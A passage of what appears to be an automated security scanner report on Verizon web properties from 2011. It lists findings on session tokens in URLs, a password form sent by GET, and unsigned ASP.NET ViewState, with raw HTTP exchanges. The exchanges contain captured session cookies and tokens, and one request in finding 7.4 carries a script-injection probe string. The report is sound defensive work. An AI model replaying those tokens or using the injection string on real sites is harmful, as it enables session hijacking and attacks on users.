AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:24:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:19 GMT
Content-Length: 909
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:29:19 GMT; path=/vztracker/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...

7. Session token in URL previous next
There are 6 instances of this issue:

https://collaborateext.verizon.com/aims/encore/VZEncoreJSJVLoop.serv
https://collaborateext.verizon.com/aims/encore/VZEncorePostlet.serv
http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage
http://sales.liveperson.net/hc/2329305/
http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard
https://www22.verizon.com/ifederation/SmMakeCookie.ccc

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. https://collaborateext.verizon.com/aims/encore/VZEncoreJSJVLoop.serv previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZEncoreJSJVLoop.serv

Issue detail

The URL in the request appears to contain a session token within the query string:

https://collaborateext.verizon.com/aims/encore/VZEncoreJSJVLoop.serv?XMLHttpRequest=true&jsClientInclude=true&id=EncoreSESS-EXT-PRODUCTION87802&encAimsSessionID=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%20tSa8hin5LSA=&clientLogStr=aimsSessionID=EncoreSESS-EXT-PRODUCTION87802

Request

POST /aims/encore/VZEncoreJSJVLoop.serv?XMLHttpRequest=true&jsClientInclude=true&id=EncoreSESS-EXT-PRODUCTION87802&encAimsSessionID=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%20tSa8hin5LSA=&clientLogStr=aimsSessionID=EncoreSESS-EXT-PRODUCTION87802 HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA=
Content-Length: 162
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

xml=%3Cxml%3E%3CaimsSessionID%3EEncoreSESS-EXT-PRODUCTION87802%3C/aimsSessionID%3E%3CmessageCount%3E0%3C/messageCount%3E%3CloopCount%3E1%3C/loopCount%3E%3C/xml%3E

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:58 GMT
Content-type: text/xml
Cache-Control: no-store
Pragma: no-cache
Expires: 0
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 1271

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<response>
<result>setChatID('09051125093');incrMessageCount();allowSending();incrMessageCount();setVisitorTextFromServer('You%20said','Forg
...[SNIP]...

7.2. https://collaborateext.verizon.com/aims/encore/VZEncorePostlet.serv previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZEncorePostlet.serv

Issue detail

The URL in the request appears to contain a session token within the query string:

https://collaborateext.verizon.com/aims/encore/VZEncorePostlet.serv?XMLHttpRequest=true&appId=141&encAimsSessionID=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%20tSa8hin5LSA=&aimsSessionID=EncoreSESS-EXT-PRODUCTION87802&clientLogStr=aimsSessionID=EncoreSESS-EXT-PRODUCTION87802,%20chatId=09051125093&randomId=510145766

Request

POST /aims/encore/VZEncorePostlet.serv?XMLHttpRequest=true&appId=141&encAimsSessionID=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%20tSa8hin5LSA=&aimsSessionID=EncoreSESS-EXT-PRODUCTION87802&clientLogStr=aimsSessionID=EncoreSESS-EXT-PRODUCTION87802,%20chatId=09051125093&randomId=510145766 HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA=
Content-Length: 147
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

xml=%3Cxml%3E%3Ccommand%3EPING-RECEIVED%3C/command%3E%3Cmessage%3E1%3C/message%3E%3CparamValue%3E%3C/paramValue%3E%3C/xml%3E&visitorName=You%20said

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:58 GMT
Content-type: text/xml
Cache-Control: no-store
Pragma: no-cache
Expires: 0
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 110

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<response>
<result>Success</result>
</response>

7.3. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage?1m2&1i945&2i1652&2e1&3u4&4m2&1u0&2u0&5m3&1e0&2b1&5sen-US&token=7479

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i945&2i1652&2e1&3u4&4m2&1u0&2u0&5m3&1e0&2b1&5sen-US&token=7479 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Mon, 05 Sep 2011 22:00:18 GMT
Expires: Tue, 06 Sep 2011 22:00:18 GMT
Server: staticmap
Content-Length: 98
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1118

.PNG
.
...IHDR.............%.V.....PLTE.......T.7....bKGD...-....
IDAT..c`.......!.3....IEND.B`.

7.4. http://sales.liveperson.net/hc/2329305/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hc/2329305/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sales.liveperson.net/hc/2329305/?&site=2329305&cmd=mTagStartPage&lpCallId=661916965686-30565438610&protV=20&lpjson=1&page=http%3A//business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb%3F_nfpb%3Dtrue%26_pageLabel%3DSMBPortal_page_main_overviewcc2a1%2527-prompt%28%2522POTS%2522%29-%2527be3f42647c0&id=3544976267&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sbp-sales&activePlugin=none&cobrowse=true&PV%21unit=sbp-sales&PV%21language=english&PV%21pageLoadTime=30%20sec&PV%21visitorActive=1&SV%21SignedIn=false&VV%21SessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2%211058537351%211315262147499&title=Verizon%20Small%20Business%20Center&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cobrowse=true&cookie=SaasSessionID%3D6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2%211058537351%3B%20AkaUTrackingID%3DCCA5CE7F785A7866A11942A8BCDFE833%3B%20AkaSTrackingID%3DF03373E721508DB1B1034D461D039B58%3B%20WT_FPC%3Did%3D2c3c65f8f20234949171315269354494%3Alv%3D1315269408034%3Ass%3D1315269354494%3B%20CP%3Dnull*%3B%20tzone%3D300%3B%20POPLocation%3Dpopip%3D50.23.123.106%26popindicator%3D%26popcity%3D%26popstate%3D%26popzipcode%3D%26popcounty%3D%26popdma%3D%26popservice%3D%26connex%3D%26prizm%3D%26usertype%3D%26partner%3D%26fiostvown%3D%26fiosvoice%3D%26vasonly%3D%26npa%3D%26nxx%3D%26msp%3D%26pws%3D%26viss%3D%26vgodfamily%3D%26vgodunlim%3D%26vec%3D%26vsbb%3D%26pts%3D%26online_backup%3D%26audio_conf%3D%26smb_premmail%3D%26sec_email%3D%26webhosting%3D%26bbaw%3D%26smb_enh_msg%3D%26webex%3D%3B%20POPRefid%3Drefid%3D%26refresh%3Dy%26reftrytime%3D0%26refnum%3D

Request

GET /hc/2329305/?&site=2329305&cmd=mTagStartPage&lpCallId=661916965686-30565438610&protV=20&lpjson=1&page=http%3A//business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb%3F_nfpb%3Dtrue%26_pageLabel%3DSMBPortal_page_main_overviewcc2a1%2527-prompt%28%2522POTS%2522%29-%2527be3f42647c0&id=3544976267&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sbp-sales&activePlugin=none&cobrowse=true&PV%21unit=sbp-sales&PV%21language=english&PV%21pageLoadTime=30%20sec&PV%21visitorActive=1&SV%21SignedIn=false&VV%21SessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2%211058537351%211315262147499&title=Verizon%20Small%20Business%20Center&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cobrowse=true&cookie=SaasSessionID%3D6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2%211058537351%3B%20AkaUTrackingID%3DCCA5CE7F785A7866A11942A8BCDFE833%3B%20AkaSTrackingID%3DF03373E721508DB1B1034D461D039B58%3B%20WT_FPC%3Did%3D2c3c65f8f20234949171315269354494%3Alv%3D1315269408034%3Ass%3D1315269354494%3B%20CP%3Dnull*%3B%20tzone%3D300%3B%20POPLocation%3Dpopip%3D50.23.123.106%26popindicator%3D%26popcity%3D%26popstate%3D%26popzipcode%3D%26popcounty%3D%26popdma%3D%26popservice%3D%26connex%3D%26prizm%3D%26usertype%3D%26partner%3D%26fiostvown%3D%26fiosvoice%3D%26vasonly%3D%26npa%3D%26nxx%3D%26msp%3D%26pws%3D%26viss%3D%26vgodfamily%3D%26vgodunlim%3D%26vec%3D%26vsbb%3D%26pts%3D%26online_backup%3D%26audio_conf%3D%26smb_premmail%3D%26sec_email%3D%26webhosting%3D%26bbaw%3D%26smb_enh_msg%3D%26webex%3D%3B%20POPRefid%3Drefid%3D%26refresh%3Dy%26reftrytime%3D0%26refnum%3D HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overviewcc2a1%27-prompt(%22POTS%22)-%27be3f42647c0
Cookie: HumanClickKEY=6007106324566664594; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1315262239661

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:37:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-546022977410-1315262242:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:37:26 GMT; path=/hc/2329305; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:37:26 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"661916965686-30565438610","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

7.5. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://verizonwireless.tt.omtrdc.net
Path:	/m2/verizonwireless/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278871714-190238&mboxPage=1315278871714-190238&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=853&browserTimeOffset=-300&colorDepth=16&mboxCount=1&loggedin=false&mbox=NSE_PNA_VWHP&mboxId=0&mboxTime=1315260872654&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278871714-190238&mboxPage=1315278871714-190238&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=853&browserTimeOffset=-300&colorDepth=16&mboxCount=1&loggedin=false&mbox=NSE_PNA_VWHP&mboxId=0&mboxTime=1315260872654&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1007
Date: Mon, 05 Sep 2011 22:14:32 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('NSE_PNA_VWHP',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-NSE
...[SNIP]...

7.6. https://www22.verizon.com/ifederation/SmMakeCookie.ccc previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/ifederation/SmMakeCookie.ccc

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo

Request

GET /ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Length: 0
Content-Type: text/html
Location: https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do?SMSESSION=NO
nnCoection: close
Expires: Mon, 05 Sep 2011 22:25:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:36 GMT
Connection: keep-alive

8. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://dashboard.opinionlab.com
Path:	/pv_controlboard.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://dashboard.opinionlab.com/login/dashboard.html

The form contains the following password field:

password

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /pv_controlboard.html HTTP/1.1
Host: dashboard.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/1.0.0 DAV/2 mod_python/3.3.1 Python/2.6
X-Server-Name: dash-apachevm02
Connection: close
Content-Type: text/html
Set-Cookie: NSC_Qvcmjd-Ebticpbse=ffffffff0912667945525d5f4f58455e445a4a423660;expires=Mon, 05-Sep-2011 22:49:47 GMT;path=/;secure;httponly
Content-Length: 16994

<html xmlns:date="http://exslt.org/dates-and-times">
<head>
<title>OpinionLab, Inc. | Dashboard V1.2</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<meta content="" name="
...[SNIP]...
<body onload="document.loginform.subscriber_id.focus()"><form method="get" name="loginform" action="/login/dashboard.html">
<input type="hidden" name="sess_id" value="94efa68611582c29a8943120d206cf56">
...[SNIP]...
<td><input class="inputURL" name="password" type="password" style="width: 150px"></td>
...[SNIP]...

9. ASP.NET ViewState without MAC enabled previous next
There are 11 instances of this issue:

http://www22.verizon.com/ResidentialHelp/eRepairSigninPopup.aspx
http://www22.verizon.com/ResidentialHelp/iHAPopup/125612.htm
http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx
http://www22.verizon.com/residentialhelp/Templates/layers/setpreferences.aspx
http://www22.verizon.com/residentialhelp/globalfooterhelp.aspx
http://www22.verizon.com/residentialhelp/globalheaderhelp.aspx
http://www22.verizon.com/residentialhelp/inhomeagent
http://www22.verizon.com/residentialhelp/inhomeagent/
http://www22.verizon.com/residentialhelp/usercontrols/SendEmail.aspx
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX
https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

9.1. http://www22.verizon.com/ResidentialHelp/eRepairSigninPopup.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
